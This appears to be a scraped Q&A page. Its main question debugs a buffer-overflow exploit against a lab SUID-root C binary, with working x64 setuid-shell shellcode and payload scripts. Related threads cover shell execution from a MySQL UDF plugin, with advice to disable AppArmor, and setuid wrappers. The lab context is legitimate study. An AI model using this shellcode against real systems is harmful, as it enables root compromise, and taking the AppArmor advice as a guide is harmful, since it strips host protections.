Buffer overflow exploit only works when using pwntools (Python)

I am attempting to exploit a buffer overflow in a simple x64 C binary with no protections (i.e. no ASLR, stack canary, PIE, NX, Partial RELRO, or FORTIFY). I am using an (updated) x64 Kali Linux 2020.4 distro (in VMware, using the VMware image from the official Offensive Security website). I am compiling the program as root and setting the SUID bit so that I can run the program with root privileges from an unprivileged account. The code of the vulnerable program (example.c) is the following:
#include <stdio.h>
#include <string.h>

void vuln_func();

int main(int argc, char *argv[])
{
    printf("Hi there!\n");
    vuln_func();
}

void vuln_func()
{
    char buffer[256];
    gets(buffer);
}
and to compile the program I am using the following Makefile:
all:
	gcc -no-pie -fno-stack-protector example.c -o example -D_FORTIFY_SOURCE=0
clean:
	rm example
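As a quick sanity check of the binary's protections, pwntools can print a checksec summary (a minimal sketch, assuming pwntools is installed and the binary was built with the Makefile above):
from pwn import ELF

# Loading the ELF logs its metadata; checksec() returns the RELRO/canary/NX/PIE summary as a string
elf = ELF("./example")
print(elf.checksec())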
Using python3's pwntools to create an exploit works just fine and I get a root shell.
from pwn import *

nopsled = b"\x90"*100
shellcode = b"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
padding = b"A"*(256-len(shellcode)-len(nopsled))  # fill the rest of the 256-byte buffer
padding += b"B"*8                                 # overwrite the saved RBP
padding += p64(0x7fffffffdec4)                    # hard-coded stack address to return to
payload = nopsled + shellcode + padding

p = process("./example")
p.recv()
p.sendline(payload)
p.interactive()
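For reference, here is how the payload length works out (a quick sketch of the arithmetic, assuming the usual [buffer][saved RBP][return address] frame layout):
nopsled_len = 100                               # b"\x90" * 100
shellcode_len = 38                              # length of the shellcode bytes above
padding_a = 256 - shellcode_len - nopsled_len   # 118 "A" bytes fill the rest of buffer[256]
saved_rbp = 8                                   # 8 "B" bytes land on the saved RBP
ret_addr = 8                                    # p64(0x7fffffffdec4)
print(nopsled_len + shellcode_len + padding_a + saved_rbp + ret_addr)  # 272 bytes in total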
but when I build the exact same payload in Python 2 without pwntools, it doesn't work.
import struct
nopsled = "\x90"*100
shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
padding = "A"*(256-len(shellcode)-len(nopsled))
padding += "B"*8
padding += struct.pack("Q", 0x7fffffffdec4)
payload = nopsled + shellcode + padding
print payload
and then running it using:
$(python exploit.py; cat) | ./example
The cat command "catches" stdin and keeps it open, but when I type commands nothing happens:
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$ $(python exploit.py ; cat) | ./example
Hi there!
whoami
id
^C
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$
What is really weird is that when I add an "\xCC" byte before the shellcode,
shellcode = "\xcc\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
I get a SIGTRAP message like this:
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$ python exploit.py | ./example
Hi there!
zsh: done python exploit.py |
zsh: trace trap ./example
Any ideas why that happens?

Related

MySQL UDF Plugin cannot Execute Shell Commands (with system() or execl())

I am running a User Defined Function (UDF) plugin for MySQL. The plugin works fine except when it makes a system call. I need to make a system call in order to run a Python 3 script!
All of the calls I make with system() or execl() return -1 and fail.
Does anybody know how to make my C-library MySQL UDF plugin able to execute shell commands? We are completely stuck on this, thanks!
Here is the C code that I am having issues with:
// Written in C
#include <string.h>
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <stdbool.h>
#include <unistd.h>   /* execl() */
#include <mysql.h>

bool udf_callpython_init(UDF_INIT *initid, UDF_ARGS *args, char *message) {
    // None of these work...
    int systemResult = system("echo hello");
    //int systemResult = execl("/bin/bash", "bash", "-c", "echo hello again...", (char *) NULL);
    //int systemResult = execl("/bin/ls", "ls", "-l", (char*)0);
    //int systemResult = system("python3 python_script.py");
    char str[100];
    sprintf(str, "%d", systemResult);
    strcpy(message, str);
    return 1;
}

char* udf_callpython(UDF_INIT *initid, UDF_ARGS *args,
                     char *result, unsigned long *length,
                     char *is_null, char *error) {
    system("echo test > does_not_work.txt");
    strcpy(result, "Hello, World!");
    *length = strlen(result);
    return result;
}
This is how I compiled this code:
gcc -o udf_callpython.so udf_callpython.c -I/usr/include/mysql/ -L/usr/include/mysql/ -shared -fPIC
I then copy that .so library file to mysql's plugin directory:
sudo cp udf_callpython.so /usr/lib/mysql/plugin/
I then create the function in MySQL like this:
CREATE FUNCTION udf_callpython RETURNS STRING SONAME "udf_callpython.so";
I then have this procedure to call this UDF:
DELIMITER $$
$$
USE test_db
$$
CREATE PROCEDURE example_insert_proc()
BEGIN
DECLARE result VARCHAR(255);
SET result = udf_callpython();
END;$$
DELIMITER ;
The output then shows the -1:
mysql> CALL example_insert_proc();
ERROR 1123 (HY000): Can't initialize function 'udf_callpython'; -1
(EDIT:)
I found that the errno is 13, which is Permission denied.
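(A quick way to confirm that mapping from a Python shell, for anyone checking their own errno values:)
import errno, os
print(errno.errorcode[13])  # 'EACCES'
print(os.strerror(13))      # 'Permission denied'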
I figured out this issue! I am answering in case anybody else has the same problem...
I disabled AppArmor (Ubuntu 20.04):
sudo systemctl disable apparmor
sudo reboot now
If you then rerun the stored procedure, the system() call succeeds:
mysql> CALL example_insert_proc();
ERROR 1123 (HY000): Can't initialize function 'udf_callpython'; 0
mysql>

After Effects: How to launch an external process and detach it

I've got an After Effects scripting question, but I'm not sure it can be solved with AE knowledge alone; it may be more of a general development question.
I want to launch an external process from After Effects. Specifically, I want to start a render of the opened AEP file with the aerender.exe that ships with After Effects, while keeping After Effects usable.
var projectFile = app.project.file;
var aeRender = "C:\\Program Files\\Adobe\\Adobe After Effects CC 2018\\Support Files\\aerender.exe";
var myCommand = "-project" + " " + projectFile.fsName;
system.callSystem("cmd /c \""+aeRender+"\"" + " " + myCommand);
So I wrote this simple JSX code and it works: it renders the scene's render queue properly.
But After Effects freezes; it waits for the end of the process.
I want it to stay usable.
So I tried writing a .cmd file and launching it with AE's system.callSystem(), and I got the same problem.
I also tried going through an .exe file (a simple Python script compiled with PyInstaller), same problem:
import sys
import subprocess
arg = sys.argv
pythonadress = arg[0]
aeRender = arg[1]
projectFileFSname = arg[2]
myCommand = "-project" + " " +projectFileFSname
callSystem = "cmd /c \""+aeRender +"\"" + " " + myCommand
subprocess.run(callSystem)
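One variation of that helper that might avoid the wait (a sketch only, assuming the same two arguments and Python 3.7+ on Windows) is to start aerender with subprocess.Popen and the DETACHED_PROCESS creation flag, so the helper exits immediately instead of blocking until the render finishes:
import subprocess
import sys

aeRender = sys.argv[1]
projectFileFSname = sys.argv[2]

# Popen returns immediately; the creation flags detach aerender from this process and its console
subprocess.Popen(
    [aeRender, "-project", projectFileFSname],
    creationflags=subprocess.DETACHED_PROCESS | subprocess.CREATE_NEW_PROCESS_GROUP,
)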
I even tried with "cmd /c start ", and it seems to be worse, as After Effects continues freezing even after the process has completed.
Is there a way to make AE believe the process is complete while it actually isn't?
Any help would be very appreciated!
system.callSystem() blocks the script's execution, so instead you can dynamically create a .bat file and run it with .execute().
Here's a sample .js:
var path = {
"join": function ()
{
if (arguments.length === 0) return null;
var args = [];
for (var i = 0, iLen = arguments.length; i < iLen; i++)
{
args.push(arguments[i]);
}
return args.join(String($.os.toLowerCase().indexOf('win') > -1 ? '\\' : '/'));
}
};
if (app.project.file !== null && app.project.renderQueue.numItems > 0)
{
var
// aeRenderPath = path.join(new File($._ADBE_LIBS_CORE.getHostAppPathViaBridgeTalk()).parent.fsName, 'aerender.exe'), // works only in CC 2018 and earlier
aeRenderPath = path.join(new File(BridgeTalk.getAppPath(BridgeTalk.appName)).parent.fsName, 'aerender.exe'),
batFile = new File(path.join(new File($.fileName).parent.fsName, 'render.bat')),
batFileContent = [
'"' + aeRenderPath + '"',
"-project",
'"' + app.project.file.fsName + '"'
];
batFile.open('w', undefined, undefined);
batFile.encoding = 'UTF-8';
batFile.lineFeed = 'Unix';
batFile.write(batFileContent.join(' '));
batFile.close();
// system.callSystem('explorer ' + batFile.fsName);
batFile.execute();
$.sleep(1000); // Delay the script so that the .bat file can be executed before it's being deleted
batFile.remove();
}
You can, of course, develop it further, make it OSX-compatible, add more features to it, etc., but this is the main idea.
Here's a list with all the aerender options (if you don't already know them): https://helpx.adobe.com/after-effects/using/automated-rendering-network-rendering.html
By the way, $._ADBE_LIBS_CORE.getHostAppPathViaBridgeTalk() will get you the "AfterFX.exe" file path, so you can use it to find the "aerender.exe" path more easily.
EDIT: $._ADBE_LIBS_CORE was removed in CC 2019, so use BridgeTalk directly for CC 2019 and above.

How to send a single pipelined command to python using bash from a groovy script console (Jenkins)?

I am using the groovy script console as offered by Jenkins.
I have this nicely working line for a Jenkins slave (Windows based):
println "cmd /c echo print(\"this is a sample text.\") | python".execute().text
Now I want the functional equivalent for a Jenkins slave (Linux based).
So I started on the Linux command line and got this core command working for me:
bash -c 'echo print\(\"this is a sample text.\"\) | python'
Then I wrapped this console command in some more escape codes and invocation decoration, but with that it stopped working:
println "bash -c \'echo print\\(\\\"this is a sample text.\\\"\\) | python\'".execute().txt
The result when running it is just this:
empty
I feel I am stuck at the moment because I am failing to untangle the multiple levels of escaping involved.
What's wrong? How can I solve it? (And maybe: why?)
PS: In case it's unclear, I want (if at all possible) to stick to a one-liner like the initial one.
If you don't need to pipe bash into python, maybe this suits your fancy?
['python','-c','print("this is a sample text")'].execute().text
If you do need it, try
['bash','-c', /echo print\(\"this is a sample text.\"\) | python/].execute().text
Using a List's .execute() helps clarify what each argument is. The slashy strings help by changing the escape character.
print "bash -c 'echo \"print(\\\"this is a sample text.\\\")\" | python'"
Output:
bash -c 'echo "print(\"this is a sample text.\")" | python'
After digging around for a while longer, I found a somewhat platform-independent solution that is aware of the error channel (stderr), handles execution failures, and even avoids OS-specific components like bash/cmd.exe:
try {
    def command = ['python', '-c', /print("this is a sample text.")/];
    if (System.properties['os.name'].toLowerCase().contains('windows'))
    {
        command[2] = command[2].replaceAll(/\"/, /\\\"/)
    }
    println "command=" + command

    def proc = command.execute()
    def rc = proc.waitFor()
    println "rc=" + rc

    def err = proc.err.text
    if( err != "" ) { print "stderr=" + err }

    def out = proc.text
    if( out != "" ) { print "stdout=" + out }
} catch(Exception e) {
    println "exception=" + e
}
println ""

setuid/setgid wrapper for python script

I have a Python script that I want to be able to run as the system user guybrush with UID 200 and group guybrush with GID 200.
At the moment my Python script (located in /path/to/script.py) looks like this:
#!/usr/bin/env python2
import os
print "uid: %s" % os.getuid()
print "euid: %s" % os.getgid()
print "gid: %s" % os.geteuid()
print "egid: %s" % os.getegid()
My attempted C wrapper (scriptwrap.c) looks like this:
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char *argv[]) {
    setuid(geteuid());
    setgid(getegid());
    return execv("/path/to/script.py", argv);
}
I then compile, chown, and chmod the wrapper as follows:
$ gcc scriptwrap.c -o scriptwrap
$ chown guybrush:guybrush scriptwrap
$ chmod 6755 scriptwrap
Yet when I run scriptwrap, I get the following output:
uid: 1000
euid: 1000
gid: 200
egid: 200
So for some reason only the GID is being set (my normal UID is 1000). What can I do to fix this?
Edit: If I chown the script to root:root and run it, the UID, eUID, GID, and eGID are all set to 0.
Also, this is on Ubuntu 12.04.4 LTS.
Well I figured this out (and learnt a bit in the process). Embarrassingly my initial problem was caused by a typo in my Python script: I was printing out the GID under the label euid, and the eUID under the label gid. Oops.
So the eUID and eGID are actually set correctly - great. But the UID and GID still aren't set despite my use of setuid and setgid in the C wrapper.
It turns out that this is due to the behaviour of setuid and setgid differing depending on whether you are root or not: if you are root and you call setuid, it sets both your real UID and your effective UID to whatever you pass in; if you are not root, it just sets the effective UID (source). So my calls to setuid (and setgid) were essentially no-ops.
However it is possible to set the real UID and GID by using the setreuid and setregid calls:
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char *argv[]) {
    setreuid(geteuid(), geteuid());
    setregid(getegid(), getegid());
    return execv("/path/to/script.py", argv);
}
Which results in the following output from the (corrected) Python script when run:
uid: 200
euid: 200
gid: 200
egid: 200
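For completeness, the corrected Python script referenced above is just the original with the two swapped labels fixed:
#!/usr/bin/env python2
import os
print "uid: %s" % os.getuid()
print "euid: %s" % os.geteuid()
print "gid: %s" % os.getgid()
print "egid: %s" % os.getegid()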

Run a python script with arguments

I want to call a Python script from C, passing some arguments that are needed in the script.
The script I want to use is mrsync, or multicast remote sync. I got this working from the command line, by calling:
python mrsync.py -m /tmp/targets.list -s /tmp/sourcedata -t /tmp/targetdata
-m is the list containing the target ip-addresses.
-s is the directory that contains the files to be synced.
-t is the directory on the target machines where the files will be put.
So far I managed to run a Python script without parameters, by using the following C program:
Py_Initialize();
FILE* file = fopen("/tmp/myfile.py", "r");
PyRun_SimpleFile(file, "/tmp/myfile.py");
Py_Finalize();
This works fine. However, I can't find out how I can pass these arguments to the PyRun_SimpleFile(..) method.
It seems like you're looking for an answer using the Python development API from Python.h. Here's an example that should work:
# My python script called mypy.py
import sys

if len(sys.argv) != 3:
    sys.exit("Not enough args")

ca_one = str(sys.argv[1])
ca_two = str(sys.argv[2])
print "My command line args are " + ca_one + " and " + ca_two
And then the C code to pass these args:
// My code file
#include <stdio.h>
#include <python2.7/Python.h>

int main(void)
{
    FILE* file;
    int argc;
    char * argv[3];

    argc = 3;
    argv[0] = "mypy.py";
    argv[1] = "-m";
    argv[2] = "/tmp/targets.list";

    Py_SetProgramName(argv[0]);
    Py_Initialize();
    PySys_SetArgv(argc, argv);
    file = fopen("mypy.py", "r");
    PyRun_SimpleFile(file, "mypy.py");
    Py_Finalize();
    return 0;
}
If you can pass the arguments into your C function this task becomes even easier:
int main(int argc, char *argv[])
{
    FILE* file;

    Py_SetProgramName(argv[0]);
    Py_Initialize();
    PySys_SetArgv(argc, argv);
    file = fopen("mypy.py", "r");
    PyRun_SimpleFile(file, "mypy.py");
    Py_Finalize();
    return 0;
}
You can just pass those straight through. Now my solution only used 2 command line args for the sake of time, but you can use the same concept for all 6 that you need to pass... and of course there are cleaner ways to capture the args on the Python side too, but that's just the basic idea.
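For instance, a cleaner way to capture the args on the Python side might look like this (a sketch only; the option names simply mirror mrsync's -m/-s/-t from the question):
# mypy.py -- same idea, using argparse instead of indexing sys.argv directly
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-m", dest="targets", required=True)  # file listing the target IP addresses
parser.add_argument("-s", dest="source", required=True)   # directory with the files to sync
parser.add_argument("-t", dest="target", required=True)   # destination directory on the targets
args = parser.parse_args()

print("targets=%s source=%s target=%s" % (args.targets, args.source, args.target))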
Hope it helps!
You have two options.
Call
system("python mrsync.py -m /tmp/targets.list -s /tmp/sourcedata -t /tmp/targetdata")
in your C code.
Actually use the API that mrsync (hopefully) defines. This is more flexible, but much more complicated. The first step would be to work out how you would perform the above operation as a Python function call. If mrsync has been written nicely, there will be a function mrsync.sync (say) that you call as
mrsync.sync("/tmp/targets.list", "/tmp/sourcedata", "/tmp/targetdata")
Once you've worked out how to do that, you can call the function directly from the C code using the Python API.
